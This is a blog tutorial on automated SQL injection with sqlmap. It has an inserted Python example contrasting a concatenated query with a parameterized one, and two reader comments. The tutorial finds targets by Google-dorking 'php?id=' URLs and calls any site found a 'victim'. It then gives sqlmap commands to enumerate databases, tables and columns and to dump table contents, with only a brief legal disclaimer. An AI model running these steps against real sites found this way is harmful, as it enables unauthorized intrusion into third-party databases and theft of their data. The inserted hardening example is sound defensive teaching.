SQL Injection Using SQLmap – [PART 1]

June 13, 2016 | Views: 9138


SQL, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.
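What "crafted incorrectly" means in practice, shown as an added example that is not part of the original post: a page that looks up a record by an `id` request parameter, first by pasting the value into the SQL text and then with a validated, bound parameter. The Python/sqlite3 stand-in, the `info` table, its rows and the function names are all constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory table standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE info (id INTEGER PRIMARY KEY, title TEXT, is_public INTEGER)")
    db.executemany(
        "INSERT INTO info VALUES (?, ?, ?)",
        [(1, "Welcome", 1), (2, "Pricing", 1), (3, "Internal draft", 0)],
    )
    return db


def lookup_vulnerable(db, raw_id):
    # Flawed: the request value is concatenated into the statement, so the
    # database parses whatever the client sent as part of the SQL itself.
    sql = "SELECT title FROM info WHERE is_public = 1 AND id = " + raw_id
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, raw_id):
    # Hardened: check the type first, then bind the value as a parameter.
    # The statement text is fixed; the value is never parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT title FROM info WHERE is_public = 1 AND id = ?"
    return [row[0] for row in db.execute(sql, (int(raw_id),))]


if __name__ == "__main__":
    db = make_db()
    tampered = "1 OR 1=1"  # constructed input: extra SQL appended to the id
    print("vulnerable, id=1:       ", lookup_vulnerable(db, "1"))
    print("vulnerable, tampered id:", lookup_vulnerable(db, tampered))
    print("safe, id=1:             ", lookup_safe(db, "1"))
    try:
        lookup_safe(db, tampered)
    except ValueError as exc:
        print("safe, tampered id: rejected,", exc)
```

With the concatenated query, the tampered value rewrites the WHERE clause and the non-public row comes back; with the bound parameter, the same input is rejected before it reaches the database.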

SQLmap is a penetration testing tool that automates the exploitation of SQL injection flaws and the takeover of SQL databases. More information on SQLmap can be found using Google or the tool's -h option.

 

Requirements:
- Basic understanding of SQL
- SQLmap
- Common sense

This is for educational and research purposes only! Do not attempt to violate the law with anything contained here.


Step 1: Identifying the Target
To find a possibly vulnerable site, we’ll Google dork search the term: “php?id=”. A dork is an advanced search using Google parameters such as “”, site:, and filetype:.

A potentially vulnerable site looks something like this: http://mytarget.com/info.php?id=1

 

Step 2: Database Enumeration
Now that we found a target, let’s identify the databases.

sqlmap -u $url --batch --dbs

Where $url is the target URL.

 

We have the database names; let’s use this information to get the tables.

sqlmap -u $url --batch --tables -D $databasename

Where $url is the Victim URL and $databasename is the name of the database.

 

With that information, we can discover the columns.

sqlmap -u $url --columns -D $databasename -T $tablename

Where $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table.


 

Step 3: The Dump
Now that we’ve found our target, let’s dump what we have.

sqlmap -u $url --dump -D $databasename -T $tablename

And we’ll get something like this:
[Screenshots: sqlmap dump output]

 

That’s it! I’ll be posting again, so stay tuned!

Bonus: Here’s a list of other popular Google dork queries.

22 Comments
  1. Is Linux best for hacking?

  2. This has been really helpful for me as a first-time user of SQLmap, thanks for posting.
